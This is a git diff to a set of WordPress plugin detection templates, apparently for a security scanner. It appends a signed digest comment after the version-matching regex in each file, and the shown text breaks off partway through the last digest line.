a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100df72a6981d6cf5db10f953256094c9899f7f2f0b790fcbf69eddceb2abe6b1430220730b101b3c7c3654eb3e4580a9b41f1aa42c15fd54070402ca8adf819cf4f7d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..8b65cc3660 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bd03c7f4e0f93d317ff50554d6b5088004a0ecd16303dc7bd99a0d42db52607d022100c445d6427560bac80fd51ca8c05b1f9365250d744b8fad1c08a8e6d481477415:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..3ad8d9152f 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220779a7057177f3948627d9da2c8f143d80970d1fc2e12d3a985801f9b2a985a77022100d20a60405f047279845004a0fbdaaf9993344293fd76a534b0c13a77c1860fad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..39f625ba8f 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203c300f68f3edffe374622739ce68def203917817e89e674d80c49dd6a9685dc5022100a8d6bcae41b748301c36bfd2578c586151788766d90fdbe3a2cc3b0b6b0881cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..67ea029ec7 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dc6376415525096f0a0e074d1aa4c4b0e7f39f09e749786319bbb7794ad1d45d02204a4f0f5e3e8eda8d4ed7cfa33afe67f2eec173c795cc5faca8e820f4d35fce40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..074472560f 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c3c2fcbdd024009a5b4fc7db7700faee642d4cc8db1fefa9e8835ac432498f46022100e1a0f0ca627e2a475495bb2914eb4503785d12bf2c500f8de0f8099b2d7e5eb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..3d9bef107a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a6fb36007af3ea3c98a5cbfbf260e530adcaed2047e29d496d06f86c27f756e4022035db63861f5aab9af81589c032151ea572869c3246da95889c29ea2c331f474d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..82627c3276 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210098449bb5abfe954ce2332fdd2920adca8ca701472e75c9c71add01272c7af618022100929ad07b40ebf60373e64cbb760c566636ccda4a1aefe5925f582bd9d5ad8e5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..8fff9b3aac 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220419f9b093e525f0768b7fd32984367b6d5aeb545535f51fa94732b043c3e41ae022100ff722037b77f4c778746a29b642e56b474d85163d1e18c908102ccf5f2065ced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..490a83cbfe 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022069685f2c3f67ac9f169802e81e664319b3042daeaed57e127957e9befc6e528e022100e44977f1efa0cd2284cdfb439c47d027ab1490383082f279c4a2c63f66979387:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..74785950fc 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200261d44f3caf6cb58700bc9c2ba96deb532a0150518090b8ee736a93729d7d85022020eff21b4ff0599829f394ed94a004d25169a86833a0a7c7a98fed753bf75733:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..23a6c48fd0 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220579045269369870a4afc269f0f1825e74eaec2030a60c5b84ee198e0fbbba97e0220231d045ea0fcf01ee5c2a97a95234f713de4e201bd9f49513d4a167139ba95d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..40aef8678b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220729f6588cf0ed9adf51af8c1fb72c7a999f62c6711b9336606287cb7b7ed3754022100ee239653793bca1c9fae4bda883a80cebc6ca27648a26f50f561bc8507895674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..39237330ec 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220545e9cb62706e8c6c878af846815b72f8233f8d453c3738282e7982643abe1f902203be3b1d6e58b5041a28988a346644d8c942dff5da070a7df07cfc857fa6661d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..4beaeedc92 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b7c53c5c0f28d3f242b40bf26d9a07a2b7c96363e58d5f404c8ad7efd3ebaf9102205694e769cd16f23535de5315b7dd4127f91f4cb462c7fa2736700ef0bd5d7164:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..343ca4468c 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022041e329d2e53be84dbea5bfce735244c0280976bb65acef374c5b15e344da488b022100c8fd117b5a8d05b90796b90196d407e0fc26294ac048e48e9d0d9ff16588272b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..7d2e9e60ed 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022035742e9306927fe39cc03b4f3ee8ff62d2099e1c31b7099cff59e47dd1a73f2c022100adbb54f565706ff0c1099c413e4e228529cfb288be3859784f31d3fcc05103d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..b880c22a9a 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203d9881fda276194c449ca40e75d0a9cdca3099f14323fb93f9e65bb6b3c23927022078e561bd6fac4555a06aeca9bb8e973ab50d9ddc706d1d71ce5763730ecb9bf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..e497eae7b4 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ca7ae7e5d401676e7bcf90a83ae55602c370370f5f0d4e04873d397d021479ba02201abb2dfa8e00d10f3c8b50d454ddbe675b9f4a0aa5b161af40d1158835a731b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..6bb29595d8 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206ceb9634652977e034ae1dd5cc3351037a9e25c1d80d68b78c3004753fd765b9022100beed4b0f298cd3e97c419cb8a3bfcae52681f0fd2ec2c6e9fcf835c99a6a638d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..8aeb595909 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a99ba9c080cf1ad0c35c6f66065ff8862b3d89514b147b50abf5957fbe3e446d022065022ec4019a20a0e36095ffe547da22b08809cf42f6b23515b0af0428463258:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..536acdc04c 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200ef67914975847a9af8cec496ff2d6224e18e45a106d897fa380f6e85486262a0220547b75a785c7c6321865769ce298b39ef6cd9ec39843e773eb6be5a443e8fec5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..986553d0bf 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201dff9118b9bd17f8806d597412ce72dc63c3d7a1b6c8c5978663fafb8a93fe96022100d03d077667b9f1368e11db07cce24378906b298f6364ef939c1b4423085dc452:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..2c577a9eca 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205d95195fd7be3f56980e74ac5abade078ff24508114b6191cabba46fbc55c2c30220763bdada348adb9d13f8c51c294fbbd2f8d8044cf4f98c32df1db3df3eeab2f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..301697b98b 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c8a0f89afd03387a92837eaab73fe85724099cc49b3eacb40f48de167583cab70220620b30eef6009e96a7fcd892e9ea600b243461bb037cb3498d1276985a81a373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..f6155718eb 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bee8f6fb945dbd83e4949dbbc0b9fdce63433ebd993e28df68f0f2375171c8c902210081e1b5f9291c264f5b5030caedd72841579041e82e84c45b7a09099456c31649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..c4bd336f65 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206780f4de9bc5e7fe2e7d2e0b73df491dd139dfb45696a41f1a53249f03fd1378022100a0e39882437b66ddad0d84b6c290650102dd6baac085f4db7a841b8323869b9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..f2f78abb44 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022075fa8f7c619bf053e75a72c3630f3c6444d51dab22ad8a8377ca686c44b8d653022100d9fe8eeabbd939707d5b8b97fb1efc52fb76afe3f4509a7bf9db9fdc3a1c5ea6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..d6573fdbe6 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210085b9974d49f8b298a639be0abbd5d03fdea2b9adcd81256ee1801dfbd1b9b40a02203755f6d57fa118824b29bf8aae1f94aa44c9327721cc22e48f741550e6c079f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..9f979318ef 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201b5c421bb1b1402256006f27b304714e5e384707ab926f23b47c213f42905e960220518722e211d4addf4612c3e5231b78fa11da1987d7872c7a6c79d1f08fc2cd0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..19d9cc724c 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220788e80ac4566889eb78190cf3d1508be6e69087fb3b4a21831b4eb1a9e4fd253022100accb3a4a0a096b89acadf7e116db00f8850386d37c2aa82b2d23394e0e5a5475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..70a043541d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ffd26e57c63a6290110f086e00d6e3abe660b84f2df00325b979321ad0f58878022067f7852b3e0a5a818908743173e1389679b80fd0be806be0816339b8bd30c2af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..95a5fc4896 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b0d388e4fdc7516b74ed1aa3e70ed26933fefd5ecff50cbbfb88a7528e454902022023e7776e9fb7f103dae727ee82a6609a3f0706d34d5e48e4fee511804b6897b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..f309fb1f75 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201a9b2fef53acae584e7a10280cafa4a7240cc71c2352d74da2a8526fd37dbe81022100c8ce1788d8c97ac07ba82ed0fab26391c0706edaa4d225306051a21e13f3ca22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..f57cc156a6 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cfa8880dc838e22c65ed5c9013110f17dfef6ab6077c4202d3dbbb3cf51300d502207fd42e80127db34a4546a6e85501b8d0c15a6e49869cb6728dbd60838cadb958:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..05b232c44e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008318c60da1a0c25debe038daccc004010016a51a37f2d10cedc2776718a68739022056933c41e3802a99738f8091979053549f094948674ff67baa262790efebb136:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..90a9aa9001 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220603a21711fe7289dbd06910d6262b218197d3a8a352238aaf0ed403f74a69ded022100be547240379040a7eb977886853788409f54bfde503b9ffe2c9860e64b191cf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..6bdc66868f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205d95a041c3dfb00721b9ce0a61b92a4907da9e4eced32918a45f4c9559a57b9c0221008f93ce76db78882935d4e4775831c975336b0e52dddfec96cc5a5074b8219f53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..e133225733 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022066148892b979901476b9f0108534131f319b6e4540f3cabf92eb97fbaa5cab37022100b0c7676bb6b0d204f144cf096b5f72d2971b0d968938646531eef04c7e542cf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..71a83d1b42 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e592530308b14e7149c66a597018644cbf23cf13dca78dd49f47cbfdec988478022100d2caa0dd8c68fa28a97fc50ca9637f67ff701a1fdc75b39225ed38c3665ba691:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..b66fde0900 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b606fb2bedaf68be78a980e352743cbc90e59b8feacc8f35ce44a0139f401ed6022100ffe71cb7fc3b57f8ddb3b1b1f013bd6ac632811003b32eda16167352c56c2a75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..2cb9617e38 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207e50bfb9524188cf97196c6171c59fa1814a8b848f01a5f68805756c96c42784022048388a421725f5b20464b6d81b11e21cc26a27460cc173b41cc1f49ad470bd23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..424e4f305e 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022067640e49dce6dddaeb3d3ee80f24f2162f59b02eadf5307069b65592beb73019022100a31baa96c266bfc3694b21cbc736f3638f3b71477a33d23a16075ab7ba9b4357:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..44b5c71ea4 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220578758d4a6f28b1b04a2af66495c09afff19d3eab550e0f7832e01de63ce09a3022100ac7c723a394a379e84ff1b0fffc4e3e6a503a164bd81a7535085dc2dbaddf6c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..456c2f04bb 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206dc056bdfceca6adbf103e5611c4cd676ccb93097745f3fcf12df147b4eafb7a022100e5b1f79a4ec79aa2a62cdd45595b3b96f7c3dbfa24704bd570ddd47c4694f587:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..b25753130e 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b8567319c29881ebf351d707b15e369b7184a30714482ebb19f58d983a337bbc02202ec33894a6733840432a8da2d452133970fc957d1f442487d32f29ad8b28a33b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..ace5e6d930 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 